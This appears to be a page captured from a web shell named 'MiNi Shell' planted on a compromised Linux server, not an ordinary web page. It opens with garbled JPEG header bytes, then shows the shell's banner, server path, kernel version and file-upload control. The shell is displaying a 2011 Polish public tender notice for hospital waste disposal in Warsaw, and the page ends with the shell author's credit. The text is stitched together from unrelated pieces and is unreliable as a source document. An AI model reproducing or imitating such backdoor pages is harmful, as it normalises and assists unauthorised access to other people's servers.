JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110527/150513-N-2011.html

<p class="kh_header"><b>Warszawa: Świadczenie usług w zakresie odbioru, wywozu i odpowiednio utylizacji odpadów komunalnych, medycznych, a także specjalnych (w tym odpadów z pracowni RTG) ze Szpitala Specjalistycznego św. Zofii w Warszawie SPZOZ.</b><br>
<b>Numer ogłoszenia: 150513 - 2011; data zamieszczenia: 27.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny św. Zofii w Warszawie Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Żelazna 90, 01-004 Warszawa, woj. mazowieckie, tel. 022 5369328, faks 022 5369378.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalzelazna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie odbioru, wywozu i odpowiednio utylizacji odpadów komunalnych, medycznych, a także specjalnych (w tym odpadów z pracowni RTG) ze Szpitala Specjalistycznego św. Zofii w Warszawie SPZOZ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie dotyczy odbioru, wywozu i odpowiednio utylizacji odpadów komunalnych, medycznych, a także specjalnych (w tym odpadów z pracowni RTG) ze Szpitala Specjalistycznego św. Zofii w Warszawie SPZOZ, zgodnie z obowiązującymi przepisami, w szczególności zgodnie z: 
- Ustawą z dnia 27 kwietnia 2001 r. o odpadach.(Dz.U. z 2010r. Nr 185, poz. 1243 ze zm.),
Na przedmiot zamówienia składają się następujące zakresy:
Zakres 1 - Odbiór odpadów komunalnych (zmieszanych, niesegregowanych)
Nazwa i kod według Wspólnego Słownika Zamówień:
CPV: Usługi wywozu odpadów 90511000-2; Usługi obróbki i usuwania odpadów, które nie są niebezpieczne 90513000-6
Odbiór odpadów komunalnych niesegregowanych (zgodnie z Załącznikiem 2) 
- Odpady komunalne niesegregowane będą wywożone zgodnie z potrzebami Zamawiającego (wezwanie na telefon) - czas reakcji nie dłuższy niż 1 dzień od wezwania, odbiór nieczystości w godzinach 600 - 800.
- Zamawiający posiada prasokontener, w którym zgniatane (prasowane) są odpady komunalne.
- Prace związane z załadunkiem odpadów należą do Wykonawcy.
- Każdorazowo, po wywozie nieczystości Wykonawca będzie mył prasokontener.
- Czas wywozu opróżniania mycia prasokontenera nie może przekroczyć 4 godzin.
- Wykonawca usługi zobowiązany jest do dostarczania Zamawiającemu kwitów wagowych ze składowiska odpadów, na podstawie, których obliczana będzie comiesięczna wartość usługi.
- Na czas awarii Wykonawca zapewni kontenery zapasowe,
- Uszkodzenia prasokontenera podczas jego transportowania, opróżniania i mycia naprawiane będą na koszt Wykonawcy.
- Zamawiający nie dopuszcza przerw w odbiorze odpadów, niezależnie od przyczyn leżących po stronie Wykonawcy.
- Rozliczenie wykonanej usługi następować będzie w okresach miesięcznych, po zakończeniu każdego miesiąca. 
Zakres 2 - Odbiór odpadów komunalnych (segregowanych)
Nazwa i kod według Wspólnego Słownika Zamówień:
CPV: Usługi wywozu odpadów 90511000-2; Usługi obróbki i usuwania odpadów, które nie są niebezpieczne 90513000-6
Odbiór odpadów komunalnych segregowanych (zgodnie z Załącznikiem 2). 
- Odbiór odpadów zgodnie z potrzebami Zamawiającego (wezwanie na telefon - czas reakcji nie dłuższy niż 1 dzień od wezwania; średnio 5 wezwań w miesiącu). 
- Odbiór odpadów nastąpi w siedzibie Zamawiającego, w dni robocze w godz. 600 - 800
- Prace związane z załadunkiem odpadów należą do Wykonawcy. 
- Wykonawca usługi będzie zobowiązany do oddania w bezpłatne używanie pojemników do każdego rodzaju odpadów (pojemność od 1000 l. - 1300 l.).
- Rozliczenie wykonanej usługi następować będzie w okresach miesięcznych, po zakończeniu każdego miesiąca. Cena za jeden przyjazd (odbiór odpadów) będzie ceną stałą, niezależną od ilości przekazanych odpadów.
- Wykonawca zobowiązany jest do wystawienia karty przekazania odpadów, każdorazowo po wywiezieniu odpadów lub po zakończeniu miesiąca.
Zakres 3 - Odbiór i unieszkodliwienie odpadów medycznych (szpitalnych) niebezpiecznych i odpadów specjalnych (w tym niebezpiecznych)
Nazwa i kod według Wspólnego Słownika Zamówień:
CPV: Usługi w zakresie odpadów radioaktywnych, toksycznych, medycznych 
i niebezpiecznych 90520000-8; Usługi w zakresie odpadów medycznych 90524000-6; Usługi gromadzenia odpadów szpitalnych 90524100-7; Usługi usuwania odpadów szpitalnych 90524200-8; Usługi gromadzenia, transportu i wywozu odpadów szpitalnych 90524400-0
Odbiór i unieszkodliwienie odpadów medycznych (zgodnie z Załącznikiem 2).
- Prace związane z załadunkiem odpadów należą do Wykonawcy.
- Odbiór odpadów nastąpi w siedzibie Zamawiającego, w dni robocze w godz. 7.00 -12.00. 
- Odbiór odpadów odbywał się będzie trzy razy w tygodniu - poniedziałek, środa, piątek. W przypadku kumulacji dni wolnych Wykonawca zapewni dodatkowy odbiór odpadów.
- Wykonawca zobowiązany jest do wystawienia karty przekazania odpadów, każdorazowo po wywiezieniu odpadów.
- Ilość odpadów uzależniona jest od ilości pacjentów, wykonanych zabiegów 
i każdorazowo inna. 
- Ważenie odpadów odbywać się będzie każdorazowo na samochodzie Wykonawcy, przy pomocy wagi posiadającej aktualny dokument poświadczający legalizację. Zamawiający będzie kontrolował aktualność legalizacji wagi w trakcie realizacji umowy. 
- Zamawiający nie dopuszcza przerw w odbiorze odpadów, niezależnie od przyczyn leżących po stronie Wykonawcy.
- Rozliczenie wykonanej usługi następować będzie w okresach miesięcznych, po zakończeniu każdego miesiąca.
- Wykonawca usługi będzie zobowiązany do bezpłatnego dostarczenia pojemników do każdego rodzaju odpadów, w odpowiednich kolorach o pojemności 2l, 5l, 10l, 30l 
i 60l.
- Wykonawca zobowiązuje się w ramach ustalonego wynagrodzenia do nieodpłatnego przeszkolenia pracowników Zamawiającego w zakresie: odbioru, transportu wewnętrznego i składowania odpadów medycznych (minimum dwa raz w roku).
Zakres 4 - Odbiór i unieszkodliwienie odpadów specjalnych (w tym niebezpiecznych) z pracowni RTG
Nazwa i kod według Wspólnego Słownika Zamówień:
CPV: Usługi usuwania odpadów toksycznych, z wyjątkiem odpadów radioaktywnych 
i zanieczyszczonej gleby 90523000-9
Odbiór i unieszkodliwienie odpadów specjalnych, w tym niebezpiecznych z pracowni RTG (zgodnie z Załącznikiem 2).
- Prace związane z załadunkiem odpadów należą do Wykonawcy.
- Odbiór odpadów nastąpi w siedzibie Zamawiającego, w dni robocze w godz. 7.00 -12.00, zgodnie z potrzebami Zamawiającego (wezwanie na telefon - czas reakcji nie dłuższy niż 1 dzień od wezwania).
- Wykonawca usługi będzie zobowiązany do bezpłatnego dostarczenia pojemników do każdego rodzaju odpadów (pojemników do odczynników RTG, tub na świetlówki itd.).
- Ważenie odpadów odbywać się będzie każdorazowo na samochodzie Wykonawcy przy pomocy wagi posiadającej aktualny dokument poświadczający legalizację. Zamawiający będzie kontrolował aktualność legalizacji wagi w trakcie realizacji umowy. 
- Wykonawca określi kwotę, jaką zapłaci za odpady udostępnione do odzysku. 
- Za odebrane surowce Wykonawca wystawi dowód odbioru odpadów określający nazwę, ilość i cenę surowca, który stanowi podstawę do wystawienia faktury VAT. 
- Zamawiający nie dopuszcza przerw w odbiorze odpadów, niezależnie od przyczyn leżących po stronie Wykonawcy.
- Wykonawca zobowiązany jest do wystawienia karty przekazania odpadów, każdorazowo po wywiezieniu odpadów.
- Rozliczenie wykonanej usługi następować będzie w okresach miesięcznych, po zakończeniu każdego miesiąca.
Zakres 5 - Odbiór i unieszkodliwienie odpadów specjalnych (w tym niebezpiecznych)
Nazwa i kod według Wspólnego Słownika Zamówień:
CPV: Usługi usuwania odpadów toksycznych, z wyjątkiem odpadów radioaktywnych 
i zanieczyszczonej gleby  90523000-9;
Odbiór i unieszkodliwienie odpadów specjalnych, w tym niebezpiecznych (zgodnie z Załącznikiem 2).
- Usługa będzie wykonywana nieodpłatnie
- Prace związane z załadunkiem odpadów należą do Wykonawcy.
- Odbiór odpadów nastąpi w siedzibie Zamawiającego, w dni robocze w godz. 7.00 -12.00. Zgodnie z potrzebami Zamawiającego (wezwanie na telefon - czas reakcji - Ważenie odpadów odbywać się będzie każdorazowo na samochodzie Wykonawcy przy pomocy wagi posiadającej aktualny dokument poświadczający legalizację. Zamawiający będzie kontrolował aktualność legalizacji wagi w trakcie realizacji umowy. 
- Zamawiający nie dopuszcza przerw w odbiorze odpadów, niezależnie od przyczyn leżących po stronie Wykonawcy.
- Wykonawca zobowiązany jest do wystawienia karty przekazania odpadów, każdorazowo po wywiezieniu odpadów.
Szczegółowy opis przedmiotu zamówienia wraz z prognozowaną ilością wytwarzanych odpadów stanowi Załącznik nr 2 Formularz cenowy. Opis przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje w okresie 3 lat od udzielenia zamówienia podstawowego możliwość zlecenia dotychczasowemu Wykonawcy usługi - zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.30.00-6, 90.52.00.00-8, 90.52.40.00-6, 90.52.41.00-7, 90.52.42.00-8, 90.52.44.00-0, 90.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący wymogu posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przedstawi aktualne zezwolenie na podjęcie działalności gospodarczej w zakresie objętym niniejszym zamówieniem (w zależności od zadania, na które Wykonawca składa ofertę), zgodne z ustawą z dn. 27 kwietnia 2001 r. o odpadach. tj. Dz.U. z 2010 r. Nr 185, poz. 1243 ze zm. oraz ustawą z dn. 13 września 1996 r. o utrzymaniu czystości i porządku w gminach tj. Dz. U. z 2005 r. Nr 236 poz. 2008. (np. zezwolenie na prowadzenie działalności w zakresie zbierania oraz prowadzenia transportu odpadów lub zezwolenie na prowadzenie działalności w zakresie odzysku, unieszkodliwiania odpadów).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący posiadania wymaganej wiedzy i doświadczenia jeżeli wykaże się wykonaniem co najmniej dwóch tożsamych z przedmiotem zamówienia usług, o wartości brutto nie mniejszej niż 50% składanej oferty w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, poda ich wartości, przedmiot, daty wykonania i odbiorców oraz załączy dokumenty, potwierdzające że usługi te zostały wykonane należycie;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym do wykonywania zamówienia, jeżeli posiada aktualną umowę ze spalarnią z której wynika, że zakład unieszkodliwiający jest w stanie odebrać i unieszkodliwić odpady w ilościach wskazanych przez Zamawiającego(dotyczy zakresu 3).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek jeżeli dysponuje kierowcami z uprawnieniami w zakresie ADR (dotyczy zakresu 3).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- oświadczenie Wykonawcy wskazujące miejsce unieszkodliwiania odpadów niebezpiecznych z podaniem metody unieszkodliwiania oraz odległości od siedziby Zamawiającego (dotyczy zakresu 3).
- kopię umowy ze spalarni lub oświadczenie podmiotu unieszkodliwiającego, z którego wynika, że zakład unieszkodliwiający jest w stanie odebrać i unieszkodliwić odpady w ilościach wskazanych przez Zamawiającego (dotyczy zakresu 3).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> tak, adres strony, na której będzie prowadzona: Zamawiający przewiduje możliwość dokonywania zmian w treści zawartej umowy w stosunku do treści oferty, w następujących przypadkach:
- jeżeli zmiany te dotyczą waloryzacji cen, np. w oparciu o podawany przez GUS wskaźnik wzrostu cen towarów i usług konsumpcyjnych, zmiany w systemie podatkowym.
- w przypadku zmiany przepisów regulujących zasady postępowania z odpadami.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalzelazna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specjalistyczny św. Zofii w Warszawie SPZOZ; ul. Żelazna 90; 01-004 Warszawa - Sekcja Zamówień Publicznych lub m.fok@szpitalzelazna.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.06.2011 godzina 09:30, miejsce: Szpital Specjalistyczny św. Zofii w Warszawie SPZOZ; ul. Żelazna 90; 01-004 Warszawa - Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Odbiór odpadów komunalnych (zmieszanych, niesegregowanych).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Odbiór odpadów komunalnych zmieszanych, niesegregowanych: 20 03 01..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.30.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Odbiór odpadów komunalnych (segregowanych).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Odbiór odpadów komunalnych (segregowanych) - 15 01 02, 15 01 01, opakowania, makulatura..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.30.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Odbiór i unieszkodliwienie odpadów medycznych
(szpitalnych) niebezpiecznych i odpadów specjalnych (w tym niebezpiecznych)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Odbiór i unieszkodliwienie odpadów medycznych (szpitalnych) niebezpiecznych i odpadów specjalnych (w tym niebezpiecznych): 18 01 02, 18 01 03, 18 01 06, 18 01 09..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.52.00.00-8, 90.52.40.00-6, 90.52.41.00-7, 90.52.42.00-8, 90.52.44.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Odbiór i unieszkodliwienie odpadów specjalnych (w tym niebezpiecznych) z pracowni RTG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Odbiór i unieszkodliwienie odpadów specjalnych (w tym niebezpiecznych) z pracowni RTG: 09 01 04, 09 01 01, 09 01 07, 15 01 10..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.52.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Odbiór i unieszkodliwienie odpadów specjalnych (w tym niebezpiecznych).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Odbiór i unieszkodliwienie odpadów specjalnych (w tym niebezpiecznych): 16 02 13, 16 02 14, 16 06 01, 08 03 18..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.52.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com